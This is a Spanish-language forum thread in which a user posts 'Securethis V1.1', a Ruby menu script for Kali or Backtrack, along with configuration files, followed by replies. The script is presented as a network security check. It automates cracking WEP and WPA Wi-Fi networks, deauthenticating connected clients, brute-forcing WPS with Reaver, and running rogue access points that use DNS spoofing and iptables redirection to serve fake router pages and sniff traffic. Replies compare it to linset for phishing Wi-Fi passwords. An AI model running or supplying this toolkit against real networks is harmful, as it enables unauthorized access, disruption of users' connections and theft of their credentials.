system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -0 150 -a #{$bssid} -c #{$station} mon0 &> /dev/null &")
sleep 148
puts "Entrez le nom du dico a utiliser"
dico=""
dico=gets.chomp
$dico=dico

system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -w #{$dico} #{$nom}.cap &> /dev/null &")
end

def wparlocal
  puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

     puts "Creation de la rogue AP"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")
sleep 3
`ifconfig at0 up`
`ifconfig at0 10.0.0.1 netmask 255.255.255.0`
`ifconfig at0 mtu 1400`
`echo > dhcpd.leases`
`iptables --flush`
`iptables --table nat --flush`
`iptables --delete-chain`
`iptables --table nat --delete-chain`
`route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 &> /dev/null`
`iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.0.0.1`
`iptables -P FORWARD ACCEPT`
`iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1:80`
     puts "Regles iptables effectues, redemarrage de dhcp3"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
     puts "Mise en place de apache et dnsspoof"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")
     puts "lancement de wireshark"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e wireshark &> /dev/null &")
end

def wparinternet
  puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

     puts "Creation de la rogue AP"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")
sleep 3
`ifconfig at0 up`
`ifconfig at0 10.0.0.1 netmask 255.255.255.0`
`ifconfig at0 mtu 1400`
`echo > dhcpd.leases`
`iptables --flush`
`iptables --table nat --flush`
`iptables --delete-chain`
`iptables --table nat --delete-chain`
`iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE`
     puts "Regles iptables effectues, redemarrage de dhcp3"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
     puts "Mise en place de apache et dnsspoof"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e wireshark &> /dev/null &")
end

def hostapd
  puts("Hostapd access point mode, good to do a MITM more discreet (make sure your hostapd.conf has got a good configuration and the way to the folder is correct. to begin, remove the line driver=hostapd and replace it with driver=nl80211)")
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e hostapd /etc/hostapd/hostapd.conf &> /dev/null &")
end

def deauth
  system ("ifconfig")
  puts("choose your network card to do the deauth (press enter if you want to use the same card as the rogue AP)")
carte=""
carte=gets.chomp
$carte=carte

system ("airmon-ng start #{$carte}")
sleep 6
system ("airodump-ng --encrypt wpa mon0")
puts("enter the channel of the target network (CH)")
canal=""
canal=gets.chomp
$canal=canal

puts("enter the adress of the target network (BSSID)")
bssid=""
bssid=gets.chomp
$bssid=bssid

puts("enter the name of the file capture in airodump")
name=""
name=gets.chomp
$name=name

system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng --#{$canal} --#{$essid} --output-format csv -w #{$name} mon0 &> /dev/null &")
sleep 5
system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airdrop-ng -i mon0 -t #{$name}.csv -r /root/rules.txt -b -p &> /dev/null &")
end

def planque
  puts "Airbase can find a hidden network too, you have to wait a little and the network will appear in your airodump-ng windows"
sleep 15
system("airodump-ng --encrypt wpa mon0")
puts "Select the channel of the target network (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Select the bssid of the target network (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

system("airodump-ng -c #{$ch} --bssid #{$bssid} mon0")

     puts "Rogue access point with parameters of the hidden network is in active mode, see airodump and wait for the name of this network"
sleep 10
system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -a #{$bssid} -X mon0 &> /dev/null &")
end

def metasploit
    puts "BEFORE Lauching metasploit if you are on unbutu or other linux plateform make sure you have all the librairies to run properly metasploit.Lauching msfconsole, this could take a time...wait.Come back to Securethis menu pressing exit in msfconsole"
sleep 20
system("msfconsole")
end

def clean
    puts "Remove your index.html and php and all css present into /var/www and replace with the new files you choose CTRL+C TO ABORT NOW!"
sleep 20
`rm /var/www/index.php`
`rm /var/www/index.html`
`rm /var/www/valid.php`
`rm /var/www/*.css`
`rm /var/www/*.jpg`
`rm /var/www/*.ico`

puts "Now enter the name of your folder wich countain the fakes pages"
name=""
name=gets.chomp
$name=name

Dir.chdir '/root'
`cp -rv #{$name} /var/www`
end

def settings
  puts "CHECK and EDIT: Important file needed for a good crack"
sleep 10
`gedit /etc/dhcp3/dhcpd.conf`
`gedit /root/dns.txt`
`gedit /etc/hostapd/hostapd.conf`
`gedit /var/log/apache2/access.log`
`gedit /var/log/apache2/error.log`
end

begin
  puts
  loop do
    choose do |menu|
      menu.prompt = "Please select option"
  puts "##################    Coded By Flow (Koala)              #################"
  puts "##################    Securethis V1.1                    #################"
  puts "                  #########################                   "
  puts "                        #############                         "
  puts "                            #####                             "
  puts "                              #                               "
  puts "~~~Does your network is secure?~~~                            "
 
      menu.choice(:Wepinjection, "injection.") { wepinj() }
      menu.choice(:Wepp0841, "-p0841.") { wepp() }
      menu.choice(:Wpabruteforce, "attaque par dico.") { wpadico() }
      menu.choice(:RogueAPlocal, "Rogue local seulement.") { wparlocal() }
      menu.choice(:RogueAPinternet, "Rogue avec internet.") { wparinternet() }
      menu.choice(:Hostapd, "Hostapd.") { hostapd() }   
      menu.choice(:DeauthAttack, "airdrop-ng.") { deauth() }
      menu.choice(:HiddenNetwork, "reseau caché.") { planque() }
      menu.choice(:Metasploit, "lancement de msfconsole.") { metasploit() }
      menu.choice(:CleanApache2WARNING, "supprime les fichier du crack.") { clean() }
      menu.choice(:Settings, "Boite a outils.") { settings() }
      menu.choice(:Quit, "Quitter le prog.") { exit }
    end
  end
end

Si useis bactrack o kali solamente entre eso:

Código: [Seleccionar]
gem install highline y puedes enpezar a usar este script for kali:

Código: [Seleccionar]
#!/usr/bin/env ruby
# encoding: utf-8

require "rubygems"
require "highline/import"

puts "Make a good choice with airodump and press ctrl+c for next step"
sleep 10
system ("airmon-ng start wlan0")
sleep 5
system ("airodump-ng mon0")

def wepinj
system ("ifconfig")
      puts "Now choose your MAC adress and press enter, warning to write as well the adress!"
mac=""
mac=gets.chomp
$mac=mac

puts "Le scan de reseau va se lancer, choisissez votre reseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wep mon0")
     puts "Rentrez un nom pour le fichier de capture"
nom=""
nom=gets.chomp
$nom=nom

     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 5
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 1800
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -P 1 #{$nom}-01.cap &> /dev/null &")
end

def wepp
system ("ifconfig")
      puts "Now choose your MAC adress and press enter, warning to write as well the adress!"
mac=""
mac=gets.chomp
$mac=mac

puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wep mon0")
     puts "Rentrez un nom pour le fichier de capture"
nom=""
nom=gets.chomp
$nom=nom

     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 5
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 1800
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -P 1 #{$nom}-01.cap &> /dev/null &")
end

def wpadico
  puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Rentrez un nom pour le fichier de capture"
nom=""
nom=gets.chomp
$nom=nom

     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

     puts "Rentrez l'adresse de la personne connecte au reseau (STATION)"
station=""
station=gets.chomp
$station=station


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -0 150 -a #{$bssid} -c #{$station} mon0 &> /dev/null &")
sleep 148
puts "Entrez le nom du dico a utiliser"
dico=""
dico=gets.chomp
$dico=dico

system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -w #{$dico} #{$nom}.cap &> /dev/null &")
end

def wparlocal
  puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch


     puts "Creation de la rogue AP"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")
sleep 3
`ifconfig at0 up`
`ifconfig at0 10.0.0.1 netmask 255.255.255.0`
`ifconfig at0 mtu 1400`
`echo > dhcpd.leases`
`iptables --flush`
`iptables --table nat --flush`
`iptables --delete-chain`
`iptables --table nat --delete-chain`
`route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 &> /dev/null`
`iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.0.0.1`
`iptables -P FORWARD ACCEPT`
`iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1:80`
     puts "Regles iptables effectues, redemarrage de dhcp3"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
     puts "Mise en place de apache et dnsspoof"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")
     puts "lancement de wireshark, ITS NOT NECESSARY close it if you have a php script in your fake page"
sleep 6
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e wireshark &> /dev/null &")
end

def wparinternet
  puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wpa --ignore-negative-one mon0")
     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch


     puts "Creation de la rogue AP"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")
sleep 3
`ifconfig at0 up`
`ifconfig at0 10.0.0.1 netmask 255.255.255.0`
`ifconfig at0 mtu 1400`
`echo > dhcpd.leases`
`iptables --flush`
`iptables --table nat --flush`
`iptables --delete-chain`
`iptables --table nat --delete-chain`
`iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE`
     puts "Regles iptables effectues, redemarrage de dhcp3"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
     puts "Mise en place de apache et dnsspoof"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")
sleep 3
puts "lancement de wireshark, ITS NOT NECESSARY close it if you have a php script in your fake page"
sleep 6
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e wireshark &> /dev/null &")
end

def wps
puts("Reaver with ten seconds between two request on the acces point.WARNING if reaver is not installed yet in the system you have to go here: http://www.linuxtrack.com/t1427-Installer-Reaver-sur-Ubuntu.htm  and follow the instructions")
sleep 20

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e reaver -i mon0 #{$bssid} -d 10 -vv &> /dev/null &")
end

def sergio
puts("MAKE SURE THE FORWADING IS ENABLED (echo 1 > /proc/sys/net/ipv4/ip_forward)   Sergio is a powerful proxy open source and easy to use for capture any traffic in the web! for more information and download go to https://code.google.com/p/sergio-proxy/ special thanks to Antares145 and his tuto, can be found here: http://antaresnotebook.wordpress.com/2013/03/31/tuto-rogue-ap-episode-2-sniffing-de-base-et-un-peu-de-fun/")
sleep 40
system ("ifconfig")
     puts "Enter your ip adress"
ip=""
ip=gets.chomp
ip=ip

`iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to #{$ip}:10000`
Dir.chdir '/root/sergio/sergio-proxy'
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e ./sergio-proxy.py -l 10000 -w /tmp/log.txt &> /dev/null &")
end

def hostapd
  puts("Hostapd access point mode, good to do a MITM more discreet (make sure your hostapd.conf has got a good configuration and the way to the folder is correct. to begin, remove the line driver=hostapd and replace it with driver=nl80211)")
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e hostapd /etc/hostapd/hostapd.conf &> /dev/null &")
end

def deauth
  system ("ifconfig")
  puts("choose your network card to do the deauth (press enter if you want to use the same card as the rogue AP)")
carte=""
carte=gets.chomp
$carte=carte

system ("airmon-ng start #{$carte}")
sleep 6
system ("airodump-ng --encrypt wpa --ignore-negative-one mon0")
puts("enter the channel of the target network (CH)")
canal=""
canal=gets.chomp
$canal=canal

puts("enter the adress of the target network (BSSID)")
bssid=""
bssid=gets.chomp
$bssid=bssid

puts("enter the name of the file capture in airodump")
name=""
name=gets.chomp
$name=name

system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng --#{$canal} --#{$essid} --output-format csv -w #{$name} mon0 &> /dev/null &")
sleep 5
system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airdrop-ng -i mon0 -t #{$name}.csv -r /root/rules.txt -b -p &> /dev/null &")
end

def planque
  puts "Airbase can find a hidden network too, you have to wait a little and the network will appear in your airodump-ng windows"
sleep 15
system("airodump-ng --encrypt wpa mon0")
puts "Select the channel of the target network (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Select the bssid of the target network (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

system("airodump-ng -c #{$ch} --bssid #{$bssid} mon0")

     puts "Rogue access point with parameters of the hidden network is in active mode, see airodump and wait for the name of this network"
sleep 10
system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -a #{$bssid} -X mon0 &> /dev/null &")
end

def metasploit
    puts "BEFORE Lauching metasploit if you are on unbutu or other linux plateform make sure you have all the librairies to run properly metasploit.Lauching msfconsole, this could take a time...wait.Come back to Securethis menu pressing exit in msfconsole"
sleep 20
system("msfconsole")
end

def clean
    puts "Remove your index.html and php and all css present into /var/www and replace with the new files you choose CTRL+C TO ABORT NOW!"
sleep 20
`rm /var/www/index.php`
`rm /var/www/index.html`
`rm /var/www/valid.php`
`rm /var/www/*.css`
`rm /var/www/*.jpg`
`rm /var/www/*.ico`

puts "Now enter the name of your folder wich countain the fakes pages"
name=""
name=gets.chomp
$name=name

Dir.chdir '/root'
`cp -rv #{$name} /var/www`
end

def settings
  puts "CHECK and EDIT: Important file needed for a good crack"
sleep 10
`gedit /etc/dhcp3/dhcpd.conf`
`gedit /root/dns.txt`
`gedit /etc/hostapd/hostapd.conf`
`gedit /root/rules.txt`
`gedit /var/log/apache2/access.log`
`gedit /var/log/apache2/error.log`
end

begin
  puts
  loop do
    choose do |menu|
      menu.prompt = "Please select option"
  puts "##################    Coded By Flow (Koala)              #################"
  puts "##################    Securethis V1.1                    #################"
  puts "                  #########################                   "
  puts "                        #############                         "
  puts "                            #####                             "
  puts "                              #                               "
  puts "~~~Does your network is secure?~~~                            "
 
      menu.choice(:Wepinjection, "injection.") { wepinj() }
      menu.choice(:Wepp0841, "-p0841.") { wepp() }
      menu.choice(:Wpabruteforce, "attaque par dico.") { wpadico() }
      menu.choice(:RogueAPlocal, "Rogue local seulement.") { wparlocal() }
      menu.choice(:RogueAPinternet, "Rogue avec internet.") { wparinternet() }
      menu.choice(:ReaverWPS, "Reaver.") { wps() }
      menu.choice(:Sniffing, "Utilisation de Sergio proxy.") { sergio() }
      menu.choice(:Hostapd, "Hostapd.") { hostapd() }   
      menu.choice(:DeauthAttack, "airdrop-ng.") { deauth() }
      menu.choice(:HiddenNetwork, "reseau caché.") { planque() }
      menu.choice(:Metasploit, "lancement de msfconsole.") { metasploit() }
      menu.choice(:CleanApache2WARNING, "supprime les fichier du crack.") { clean() }
      menu.choice(:Settings, "Boite a outils.") { settings() }
      menu.choice(:Quit, "Quitter le prog.") { exit }
    end
  end
end



Si useis una version unbutu 10.04 o inférior es los dos primeros codigos que hay que poner.
El dhcpd.conf:

Código: [Seleccionar]
subnet 10.0.0.0 netmask 255.255.255.0 {
interface at0;
range 10.0.0.2 10.0.0.10;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
allow unknown-clients;

dns.txt:

Código: [Seleccionar]
10.0.0.1*.*
Derecho para el servidor apache2 cuando las falsas paginas estan puesto a dentro:

Código: [Seleccionar]
sudo chown -R root:www-data /var/www/*                        //donner les droits
 find /var/www -type d -exec sudo chmod 750 {} \;
 find /var/www -type f -exec sudo chmod 640 {} \;
 chmod a+x /var/www
 chmod a+rX /var/www/*
service apache2 restart

Ojo que tu servidor no esta en linea  ;D


Gracias a el membro que me adado las paginas de ONO-XXXX, cuando tendré mas tiempo lo haré :)

Título: Re:Securethis V1.0
Publicado por: A5Te1aRp@QDa7ei en Diciembre 04, 2013, 11:12:13 am
Gracias por vuestras respuestas,

la verdad que después de mucho intento consegui evadir tanto banner falso de descarga. Me dí cuenta rapidamente del ADP blocker, aun asi es una odisea adivinar el link que no lleva regalito. En fin, a seguir  ;)

Título: Re:Securethis V1.0
Publicado por: 1camaron1 en Diciembre 05, 2013, 10:01:05 am
Muy buen aporte koala63 :)
Título: Re:Securethis V1.0
Publicado por: teik en Julio 02, 2014, 20:28:47 pm
Como sigue el desarrollo? es una especie de linset pero mas avanzado no?
Título: Re:Securethis V1.0
Publicado por: sprocet39 en Julio 16, 2014, 14:51:59 pm
Sí, según he estado ojeando el hilo, es muy parecido a linset, pero mas creíble porque emula la configuración original del router, creo, corregidme si me equivoco.
Aunque parece un proyecto un poco olvidado,koala no tendrá mucho tiempo.
Un saludo desde Asturias
Título: Re:Securethis V1.0
Publicado por: koala63 en Julio 16, 2014, 17:45:54 pm
Hola a todos  8)


Vengo ahora de ver los mensajes, podeis usar este script o ver en la parte de los tutorial, he monstrado un otra manera de hacer un fake router:

http://lampiweb.com/foro/index.php/topic,12460.0.html


Pero si teneis preguntas, idéas o algo con securethis, diga me en este tema y ya vere lo que puedo hacer  ;)
Título: Re:Securethis V1.0
Publicado por: teik en Julio 16, 2014, 20:31:01 pm
En wifislax es imposible hacerlo correr tienen muchas dependencias y cosas que instalar por fuera. Seria bueno si lo pudieses portar
Título: Re:Securethis V1.0
Publicado por: koala63 en Julio 16, 2014, 20:42:41 pm
Quisas en bash para quittarse de todas las dependencias... o en perl mmmh no sé.